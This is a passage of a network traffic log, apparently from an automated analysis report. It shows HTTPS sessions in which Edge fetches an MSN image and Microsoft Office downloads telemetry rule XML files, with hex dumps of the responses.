                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC16384INData Raw: e6 89 8e c4 e4 44 2c 62 12 aa 0e d2 92 bc 30 61 68 e0 f5 95 69 fc 92 32 01 c0 28 9c fa 6d d3 e2 9d a6 55 14 d7 25 74 4d 54 c2 6e d3 af 9a ab da d3 e1 e6 a3 07 63 6c 15 f5 f0 56 26 3d e5 2b 06 b7 22 ab 76 d4 e3 ed 1e 3e 95 9c 6d 73 86 bd dd 7f 17 83 49 af 94 b2 ef 28 e9 e2 1d 50 9c 9b e6 a1 ed 86 98 53 8a 2d c5 78 3b 44 d5 3d 19 f7 91 c8 a5 dc 21 46 6a 0e 2d 0a b2 3c 3d a2 f3 d1 13 5c 75 88 49 9a 83 b5 6f d4 10 bc 3c 96 c7 bc 8e b0 9e ea be 36 f1 27 c5 66 d2 d2 df 36 18 a3 aa c9 55 71 83 c5 66 d2 cd e5 86 28 e6 b8 d1 ce 14 2d a8 df ee f2 f2 58 d5 d9 75 4d 33 c9 d5 4f 6b 3a 6b 8e 6e e5 30 5c 06 44 f2 6f a1 55 a6 e1 a3 dd e4 bc bd c9 88 9e 9d b3 fa b7 ae 99 f8 61 eb 6d c6 2e 93 3c a3 f4 61 45 51 f1 4b d4 d2 15 4e 78 47 3e ee 17 bc 2e 4b 1c e9 90 5c 6f c4 89
                                                                                                                                                                                                                                                        Data Ascii: D,b0ahi2(mU%tMTnclV&=+"v>msI(PS-x;D=!Fj-<=\uIo<6'f6Uqf(-XuM3Ok:kn0\DoUam.<aEQKNxG>.K\o
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC274INData Raw: 9e 12 a3 fc b3 90 f1 0b a3 d9 70 00 78 fb 97 4f e1 cf ca 5c 98 fa fe ce 5f cf 97 9c 3b 7b be 96 8f 35 2c 35 8f af a1 75 3b 23 1a fa f7 2e 9b ed c3 87 1b 96 db 92 ef c1 da e4 f6 4f 39 fa f9 2e bf 66 07 cc 7a 5d 77 e3 a5 e7 e2 9e 90 f3 fb ba a7 57 a3 82 3a cb 8e 69 bb 30 0f 8a ec 76 6d cf dc bd 08 aa 38 d9 e7 e3 97 9b 34 55 c2 25 e9 e0 8d 5c 57 34 6b 3d fe 92 bb 78 63 82 f4 a2 67 85 9e 6e 27 95 31 1c 6e f5 6c f3 f0 d1 a4 9e 6d 5d 8c 18 89 d3 9a f5 af 3d 7c 5e 6e 2b 73 78 d6 8e 9e 0f 57 05 de 75 cd 2e d3 d7 a2 ee 16 8d 23 af ad d7 b3 15 5b 8b c9 8a bb 7b 1e 15 54 e2 e0 f6 26 98 e5 da f3 dd 91 1f b7 bd 76 1f 4d a5 7b 38 e1 e6 53 5c bc 29 db 7a d5 6d c4 b8 64 70 bf 72 e8 3a 97 00 7a 95 eb 5d c3 15 f5 f2 78 d3 0f 42 aa 3a 79 b9 8a d1 66 79 fa f4 5d cc 22 a7 9b
                                                                                                                                                                                                                                                        Data Ascii: pxO\_;{5,5u;#.O9.fz]wW:i0vm84U%\W4k=xcgn'1nlm]=|^n+sxWu.#[{T&vM{8S\)zmdpr:z]xB:yfy]"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        92192.168.2.54988123.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC634OUTGET /tenant/amp/entityid/BB1msyO5.img HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Last-Modified: Wed, 20 Nov 2024 09:28:58 GMT
                                                                                                                                                                                                                                                        X-Datacenter: eastus
                                                                                                                                                                                                                                                        X-ActivityId: 1eeadd92-b1ae-408f-87a2-07d3af80d527
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msyO5
                                                                                                                                                                                                                                                        X-Source-Length: 76988
                                                                                                                                                                                                                                                        Content-Length: 76988
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=380356
                                                                                                                                                                                                                                                        Expires: Mon, 25 Nov 2024 09:29:03 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:47 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC15865INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                        Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: c5 05 43 29 8a 72 20 8a e2 1a 32 43 62 20 26 80 63 7d 7b d8 e0 e8 db fa 65 ef 15 8d b2 95 7c b4 15 93 99 29 f2 a4 49 8c c4 49 17 09 2f 84 81 61 d6 ca d3 ab 69 8d 1c 71 43 22 1e 02 48 02 3a 81 e3 46 40 91 4a f7 bb da ec 0d 04 6b f7 57 88 e5 2c d1 94 8c 80 42 92 4c 02 60 8a 49 d2 e3 79 b9 f2 92 df 43 7b 20 da dc 52 54 b0 95 14 22 33 a8 02 52 9c df 6e 63 a0 9b 25 e5 5c f6 4d 3d fd 1e 3a 6b cb 8a 3b 0e 43 29 1e 81 16 cf a4 36 21 a9 79 54 a1 e3 57 b4 b1 9b 73 6f e5 a8 0c c8 5c a5 26 50 64 54 4c 1d 2a 34 20 e8 5a 29 20 68 66 97 69 83 8a 0b 8e cb ba 60 f2 d2 18 f4 71 27 29 07 2a 54 05 8a 98 f4 20 fa b6 24 92 4d a5 8d e6 44 71 b4 36 31 48 1d cf 16 3c a8 4f 45 3d cd d5 13 4d 38 c0 31 bc b4 d1 41 5d 75 11 a3 d9 48 d4 11 22 46 22 f0 eb c4 93 7d 3d 18 7a f1 0d 80 6c
                                                                                                                                                                                                                                                        Data Ascii: C)r 2Cb &c}{e|)II/aiqC"H:F@JkW,BL`IyC{ RT"3Rnc%\M=:k;C)6!yTWso\&PdTL*4 Z) hfi`q')*T $MDq61H<OE=M81A]uH"F"}=zl
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC1995INData Raw: cf 2e 4c da 69 5a ce 0d 14 67 9e be fb 5c 02 22 c9 75 28 cc a8 11 6e a4 0f 53 47 63 8a eb 83 64 c2 4c a8 12 2d 83 58 c0 c1 1e 8c 39 cc 35 ab 35 f7 1c 3d a2 8d 1c 02 88 ab 60 a2 9a 83 14 23 91 d4 7e ac 8a 9b 7c 2a 18 a1 9a 30 04 83 09 98 d6 06 82 6d ba ad 28 cd 40 9a 1f 34 dd 64 6b 33 d4 43 14 03 5a e8 c2 0d b5 65 cd 96 13 31 36 02 74 9c 68 c5 18 f1 ee 6e 64 69 2d 60 9e 25 c5 04 cb 51 ab 21 12 f4 38 d0 51 26 83 e2 c7 0f a4 95 24 cd 41 07 b1 ea e4 a4 85 4c e6 b2 22 31 9f 73 83 9a 1e 20 eb cb 5f 73 78 6b 0c a1 43 8f ac 6c 95 10 10 42 89 1a 69 18 49 81 65 23 c5 88 88 89 8d 38 97 96 9f 4f 29 64 02 6c 7d 35 88 b2 66 fa ba 12 01 f5 10 fc 4f 75 06 13 03 47 21 98 27 bb 62 2a c5 04 9c c8 20 82 44 41 ed 0f a3 7b 71 5b cb 2b 51 95 2a a6 23 5e 9e e7 53 b4 57 f6 a6 48
                                                                                                                                                                                                                                                        Data Ascii: .LiZg\"u(nSGcdL-X955=`#~|*0m(@4dk3CZe16thndi-`%Q!8Q&$AL"1s _sxkClBiIe#8O)dl}5fOuG!'b* DA{q[+Q*#^SWH
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC16384INData Raw: 52 75 8c 4d 03 f9 9b 9f 56 9c a0 44 47 1c db 90 2d 0f a9 08 12 24 d2 45 75 e7 0f af 7f 61 1b 4b 84 28 2c 40 20 c4 4f 29 a3 5a d3 ce 4c 8d 29 db c1 e8 17 5b 7b 3a 53 2d f2 fa b5 94 04 09 7b 2b eb 09 e3 d8 f2 92 45 81 cd cb 4e 43 21 96 15 07 1d 6b ab 26 53 ab 31 12 80 21 23 59 55 6b df dd 0e da 53 8d 2c d2 4d 1b 47 76 f0 d6 53 9b 28 d7 59 7b 27 2f 57 d6 94 6b 58 b6 da b5 ca d6 b4 e6 29 33 73 5c 3e 2f b0 0e 23 56 22 9b 9d b4 a4 02 5e e2 59 72 b6 89 b3 8c 5a ca 00 8e 3d ec 99 7e 3c 43 71 a7 c1 e8 92 ed 94 18 fb 9f 52 86 de 51 13 9a d9 d3 91 d7 93 50 32 90 44 86 e5 27 2e 69 e5 6b 5b 34 06 59 ba 19 33 2a 32 92 60 57 09 be 19 90 48 04 00 2a 20 c8 07 a5 c5 a2 81 0e 5a d0 51 73 42 98 b1 9c 09 6a 52 ed 94 e7 d5 e8 e3 89 66 ca f4 35 a5 05 14 70 06 78 7b 2b d5 94 09
                                                                                                                                                                                                                                                        Data Ascii: RuMVDG-$EuaK(,@ O)ZL)[{:S-{+ENC!k&S1!#YUkS,MGvS(Y{'/WkX)3s\>/#V"^YrZ=~<CqRQP2D'.ik[4Y3*2`WH* ZQsBjRf5px{+
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC16384INData Raw: 54 50 4e 51 a1 af 34 dc c8 84 85 a6 48 13 e3 cb e0 f8 5e 53 3b 61 d7 48 d5 ce 95 5d ab ea 40 98 f5 b9 f3 9d b8 9a 14 c6 b3 30 e6 7f 2c 0d 2d b6 5d 8d 3a 93 af 47 b7 f3 f6 f6 84 7d c4 9b 18 4a f7 77 e8 3c b7 c5 d8 97 e6 ed a9 22 49 3e 8c aa fa ec a2 36 d3 cc fb 07 bd f7 f5 22 af 29 af 28 71 d9 37 a4 5f 9c bd 54 ed a7 6c 12 a8 e7 40 f9 d5 f5 63 4d b1 98 df a0 f6 97 e0 af 71 4b 33 b8 a2 78 b9 8c ee 13 41 41 c6 af 8e 5d fa e9 a7 f3 ff 00 8d c7 6b 9e bf c3 b7 77 79 4b 31 9b 36 03 ed 0c 47 6c c6 63 5a c3 1a 32 a0 4a b5 b0 5a ee e6 f9 58 80 02 53 77 c5 f1 9c b1 ab ca 75 9e 90 eb 11 31 a4 7b ba 7e 62 36 c4 50 9b 87 b5 f2 2b 70 ac d7 4b 00 d1 f3 b7 90 31 bb e2 f1 3d c9 cb ca 23 83 71 8c 47 9c 8c 20 41 3a 5d 69 7d 31 03 32 8c 13 f6 a6 e1 7e 0f 9c 42 08 52 aa 7f 0b
                                                                                                                                                                                                                                                        Data Ascii: TPNQ4H^S;aH]@0,-]:G}Jw<"I>6")(q7_Tl@cMqK3xAA]kwyK16GlcZ2JZXSwu1{~b6P+pK1=#qG A:]i}12~BR
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC7952INData Raw: 46 35 6b 37 36 83 73 b0 7f 0b 88 42 70 0d 69 c1 2d e0 fe 17 b2 9b 9d 42 47 7e ae d9 f1 6d 04 7e 53 d5 ca 5c ca dc 6a d1 b4 0b 9c 75 08 92 4e a3 2f 7f 83 78 17 87 a9 7b 87 bb 0d 02 f7 20 5e 3a 3b cd e6 1b 28 bd ec a1 c7 22 18 5c ae 46 2e b1 a9 21 51 36 19 15 23 c1 85 8c 5a 64 02 48 02 4e bc 68 df 2f 12 d7 9c b0 d5 1f 94 75 0d 6b 71 3d 1d 13 6c 72 75 82 09 22 ec 1b 47 2e ef 4b 9a fe 8c 21 c5 ea 61 cc 38 4f 67 73 0b bd 18 68 c0 78 b4 88 ba 3b 7c 5b 4e 0e e6 b8 30 5c a3 0c 63 f5 76 3b 3c 15 83 d9 81 bd 84 ad 84 47 37 79 b8 54 1a e6 ff 00 30 ec 5d 0f c6 ae 4e 07 ab 59 18 f7 a7 b1 ec c2 f3 e9 ec 74 37 22 d0 9c 3d 1d 2a d7 cd 1d 3d 8d 4a a3 f3 30 b9 86 23 c1 a9 50 34 3e 0f 66 2e 09 c3 d4 fb 98 69 c4 b5 80 e1 0a 38 72 0d 83 09 23 16 82 6d 2c 87 30 3a 4f 6f 89 72
                                                                                                                                                                                                                                                        Data Ascii: F5k76sBpi-BG~m~S\juN/x{ ^:;("\F.!Q6#ZdHNh/ukq=lru"G.K!a8Ogshx;|[N0\cv;<G7yT0]NYt7"=*=J0#P4>f.i8r#m,0:Oor
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC2024INData Raw: e8 2b ba b1 3a e0 2c 3c c5 2f 66 0c 0a ec b1 66 7b 36 0c 0d 2e 4b 1c 93 63 de 6b 98 16 5e 96 3a 8b 1d d5 81 25 d9 63 75 83 4b b2 c7 2f 66 60 67 65 87 3b 69 60 ee 4b 49 6a 4c 30 33 20 81 ab e5 ce c9 99 81 e4 5c d1 a6 b6 16 c0 e0 c2 bc df 5e 03 6c b8 b2 85 0d a1 c5 79 45 2a c7 9e 70 60 78 76 8c 39 9b 66 70 1a 97 16 3c b0 f6 7c 5c cc 38 96 0f 4b 9b 03 80 62 cc 1d 0a 60 43 07 50 d2 96 36 7b 9b 8a 90 1d 87 89 86 c1 4c 30 43 7c 84 37 0b 01 a9 dc 06 c9 61 80 c7 d5 d8 c6 5f 29 d6 94 6e c0 a0 4b b9 53 7b 1b 86 6f 86 17 47 66 5a c3 cc 1e 1b 72 69 2f 4b 0d dd b7 66 8d c5 18 56 ae e6 76 58 67 5a 73 79 83 c3 99 4b d3 8b 93 8b 05 20 38 ed 1e 61 9d 87 a5 ec cc 2c 3b a3 99 f1 61 cc 25 81 21 d8 c5 ae 60 f6 61 73 07 81 8b 90 d7 e6 07 33 86 0e da 8c 5f 30 62 e0 54 b0 3c 5f
                                                                                                                                                                                                                                                        Data Ascii: +:,</ff{6.Kck^:%cuK/f`ge;i`KIjL03 \^lyE*p`xv9fp<|\8Kb`CP6{L0C|7a_)nKS{oGfZri/KfVvXgZsyK 8a,;a%!`as3_0bT<_


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        93192.168.2.54987813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:47 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                        x-ms-request-id: c8d99181-101e-007a-5a1a-3b047e000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234947Z-r1d97b99577xdmfxhC1TEBqbhg000000018g000000005hnd
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        94192.168.2.54988213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:48 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                        x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234948Z-178bfbc474bkvpdnhC1NYCuu2w00000000mg00000001g0f6
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        95192.168.2.54988313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:48 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                        x-ms-request-id: b82dc135-b01e-0053-1a8c-3acdf8000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234948Z-r1d97b9957744xz5hC1TEB5bf800000009g00000000066zr
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        96192.168.2.54988413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:47 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:48 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                        x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234948Z-r1d97b99577l6wbzhC1TEB3fwn00000009rg000000006hsc
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        97192.168.2.54988513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
